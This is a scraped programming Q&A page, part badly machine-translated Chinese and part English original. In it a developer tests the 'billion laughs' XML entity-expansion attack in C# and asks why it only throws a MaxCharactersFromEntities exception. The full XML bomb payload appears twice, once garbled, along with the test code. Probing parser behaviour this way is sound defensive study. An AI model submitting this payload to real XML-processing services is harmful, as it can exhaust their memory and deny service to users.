我试图从 MSDN杂志页面其中,它说,当处理的以下几行代码会导致内存使用量的增幅高达3GB。
< ;? XML版本=1.0>?; <!DOCTYPE LOLZ [<!ENTITY哈哈笑> <!ENTITY lol2&放大器;笑;&安培;笑;&安培;笑;&安培;笑;&安培;笑;&安培;笑;&安培;笑;&安培;笑;&安培;笑;&安培;笑; > <!ENTITY lol3&放大器; lol2;&安培; lol2;&安培; lol2;&安培; lol2;&安培; lol2;&安培; lol2;&安培; lol2;&安培; lol2;&安培; lol2;&安培; lol2; > <!ENTITY lol4&放大器; lol3;&安培; lol3;&安培; lol3;&安培; lol3;&安培; lol3;&安培; lol3;&安培; lol3;&安培; lol3;&安培; lol3;&安培; lol3; > <!ENTITY lol5&放大器; lol4;&安培; lol4;&安培; lol4;&安培; lol4;&安培; lol4;&安培; lol4;&安培; lol4;&安培; lol4;&安培; lol4;&安培; lol4; > <!ENTITY lol6&放大器; lol5;&安培; lol5;&安培; lol5;&安培; lol5;&安培; lol5;&安培; lol5;&安培; lol5;&安培; lol5;&安培; lol5;&安培; lol5; > <!ENTITY lol7&放大器; lol6;&安培; lol6;&安培; lol6;&安培; lol6;&安培; lol6;&安培; lol6;&安培; lol6;&安培; lol6;&安培; lol6;&安培; lol6; > <!ENTITY lol8&放大器; lol7;&安培; lol7;&安培; lol7;&安培; lol7;&安培; lol7;&安培; lol7;&安培; lol7;&安培; lol7;&安培; lol7;&安培; lol7; > <!ENTITY lol9&放大器; lol8;&安培; lol8;&安培; lol8;&安培; lol8;&安培; lol8;&安培; lol8;&安培; lol8;&安培; lol8;&安培; lol8;&安培; lol8; > ]≥ <&LOLZ GT;&安培; lol9;< / LOLZ>当我试图把该文本在Visual Studio中的XML文件粘贴它的确显示内存增加并且,可以在CPU的使用率。但是当我试图把它放在一个文本文件,而不是一个XML文件,并使用C#加载它,它没有任何影响
更新:我想loadXML方法应该有一定的影响,但我想这是不处理的部分。当我试图让第一个孩子它(即C#)抛出一个异常,告诉 MaxCharactersFromEntities 被超过。
更新:这里是我的代码,以及:
使用系统; 使用的System.Xml; 命名空间BillionLaughsAttack {类节目 { //含上面提到的十亿笑文件 // txt文件:由于一个XML文件会导致视觉工作室解析静态字符串xmlFileLocation =./MyData/DeepXML.txt; 静态无效的主要(字串[] args) {字符串xmlContent = NULL; 就是System.IO.StreamReader SR; System.Xml.XmlDocument文档=新的XmlDocument(); 试 { SR =新就是System.IO.StreamReader(xmlFileLocation); xmlContent = sr.ReadToEnd(); //加载含有亿元笑攻击(!这不会做任何事情) document.LoadXml(xmlContent)XML;通过获得的第一个孩子 // PROCES XML(这将导致异常!)字符串VAL = document.FirstChild.Value; } 赶上(例外五) { Console.WriteLine(e.Message); } } } }解决方案
这攻击利用了脆弱的 XML 功能。
通过XML解析器运行将递归扩展实体并占用大量的内存。结果阅读它以纯文本格式不会做任何事情。
I am trying to test the XML code from an MSDN magazine page where it says that the following lines of code will cause an increase of memory usage up to 3GB when processing.
<?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz>When I tried to paste that text into an xml file in Visual Studio it indeed showed a increase in memory and also in CPU usage. However when I tried to put it in a text file, instead of an XML file and load it using c#, it didn't have any impact.
Update: I thought the LoadXml method was supposed to have an impact, but I guess that is not the processing part. When I tried to get the first child it (i.e. c#) threw an exception telling that MaxCharactersFromEntities was exceeded.
Update: here is my code as well:
using System; using System.Xml; namespace BillionLaughsAttack { class Program { //The file containing the billion laughs mentioned previously //a txt file: Since an xml file causes visual studio to parse static String xmlFileLocation = "./MyData/DeepXML.txt"; static void Main(string[] args) { String xmlContent = null; System.IO.StreamReader sr; System.Xml.XmlDocument document = new XmlDocument(); try { sr = new System.IO.StreamReader(xmlFileLocation); xmlContent = sr.ReadToEnd(); //Load xml containing Billion Laughs Attack (this won't do anything!) document.LoadXml(xmlContent); //Proces xml by getting first child (this will cause an exception!) String val = document.FirstChild.Value; } catch (Exception e) { Console.WriteLine(e.Message); } } } }解决方案
This attack exploits a vulnerable XML feature.
Running it through an XML parser will recursively expand the entities and occupy a large amount of memory. Reading it as plain text won't do anything at all.
更多推荐
是十亿笑攻击应该在C#中的工作?
发布评论